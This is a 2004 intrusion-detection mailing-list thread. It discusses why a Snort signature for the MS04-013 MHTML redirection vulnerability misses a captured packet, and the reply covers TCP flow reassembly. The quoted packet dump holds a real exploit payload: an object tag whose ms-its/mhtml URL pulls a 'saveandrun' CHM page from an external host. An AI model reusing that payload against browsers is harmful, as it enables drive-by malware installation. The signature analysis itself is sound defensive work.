[Intrusions] mhtml signature

Affeld, James JAffeld at sccd.ctc.edu
Thu Aug 5 00:58:58 GMT 2004 

1) Since this signature is looking for misbehavior on the part of a web server, that misbehavior must be part of an established session.  It is possible (though unusual) to include data with a client's SYN packet; I don't really see a way for a server to include it in the SYN-ACK.  At least, not and have the data interact with a web browser.  For this attack, the web server has to wait for a client's web browser to make a connection.  The client then has to ask the web server to send it stuff; this takes part only in an established connection.

2) Nope, for the reasons discussed above.

That leaves the question of why Snort won't alert on the packet you captured with the 'flow:from server,established;' as part of the signature.  I wrote a similar rule for these vulnerabilities and included the 'flow' rule option, and the rule generates alerts when captured live, but not when read from the Snort binary log.  Interestingly, sending the Snort binary log back on the wire with tcpreplay does not generate an alert.  Obviously the signature worked the first time, because the binary log has the alert.  I thought you had identified a neato bug for the good folks at Sourcefire, then I looked into the documentation.  Section 2.6.9 of the manual says that the flow rule option is tied to TCP stream reassembly. It may be that a simple replay won't actually simulate the tcp session properly for the flow rules to fire.  

http://www.snort.org/docs/snort_manual/node15.html#SECTION00369000000000000000

-----Original Message-----
From: lola marais [mailto:lola_marais at hotmail.com]
Sent: Wednesday, August 04, 2004 5:18 AM
To: intrusions at lists.sans.org
Subject: [Intrusions] mhtml signature


I have been working on a problem and require the assistance of the broader 
list community.
Credit is given to the owner of this signature at 
http://sourceforge.net/mailarchive/message.php?msg_id=7758516


I am planning on using this signature for a detect in part 2 my GCIA 
practical.

The problem is that I am not able to get it working 100% with the data that 
i have. By not working I mean that it will miss the single packet that I 
have captured.

I have captured some data from a network using tcpdump. The capture contains 
the data content required to trigger the event. The capture contains a 
single packet for that session, no more.

When I read the data past snort with the signature enabled, then NO alerts 
are triggered. If I remove the part of the signature 
"flow:from_server,established" and then pass the same data I have 1 event

The signature looks for an established connection.
My question is:

1. Why has the author of the signature decide to look for an established 
connection?
2. Does the signature stand a chance of missing some events by looking only 
for established connections?

The current version of the signature has the following structure.

alert tcp any any -> $HOME_NET any (msg:"Microsoft MTHML URL Redirection 
Attempt"; flow:from_server,established; content:"mhtml|3A|file|3A|"; nocase; 
reference:cve,CAN-2004-0380; 
reference:url,www.microsoft.com/technet/security/.../MS04-013.mspx; 
classtype:web-application-attack; rev:2;)

The data packet that I have captured looks as follows:

07/28/04-11:23:51.262652 MAC:removed -> MAC:removed type:0x800 len:0xC2
Proxy:ProxyPort -> InternalHost:4003 TCP TTL:63 TOS:0x0 ID:33030 IpLen:20 
DgmLen:176 DF
***AP**F Seq: 0xDC274ADF  Ack: 0x2B3B3965  Win: 0xC1E8  TcpLen: 20
0x0000: 00 0A 42 42 80 0A 00 03 32 87 9A 71 08 00 45 00  ..BB....2..q..E.
0x0010: 00 B0 81 06 40 00 3F 06 2B 92 9E A9 83 0D 9E A6  .... at .?.+.......
0x0020: CE 52 1F 4C 0F A3 DC 27 4A DF 2B 3B 39 65 50 19  .R.L...'J.+;9eP.
0x0030: C1 E8 70 F3 00 00 20 20 20 20 3C 6F 62 6A 65 63  ..p...    <objec
0x0040: 74 20 64 61 74 61 3D 22 26 23 31 30 39 3B 73 2D  t data="&#109;s-
0x0050: 69 74 73 3A 6D 68 74 6D 6C 3A 66 69 6C 65 3A 2F  its:mhtml:file:/
0x0060: 2F 43 3A 5C 66 6F 6F 2E 6D 68 74 21 68 74 74 70  /C:\foo.mht!http
0x0070: 3A 2F 2F 77 77 77 2E 66 72 65 65 33 32 2E 63 6F  ://www.<blocked> 
free32.co
0x0080: 6D 2F 50 4F 50 2E 43 48 4D 3A 3A 2F 73 61 76 65  m/POP.CHM::/save
0x0090: 61 6E 64 72 75 6E 2E 68 74 6D 22 20 74 79 70 65  andrun.htm" type
0x00A0: 3D 22 74 65 78 74 2F 78 2D 73 63 72 69 70 74 6C  ="text/x-scriptl
0x00B0: 65 74 22 3E 3C 2F 6F 62 6A 65 63 74 3E 20 D1 7F  et"></object> ..
0x00C0: CA 27                                            .'

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

_________________________________________________________________
Death to pop-up ads! Get the ultimate toolbar today. 
http://toolbar.msn.co.za?DI=1054&XAPID=2083

_______________________________________________
Intrusions mailing list
Intrusions at lists.sans.org
http://www.dshield.org/mailman/listinfo/intrusions

More information about the Intrusions mailing list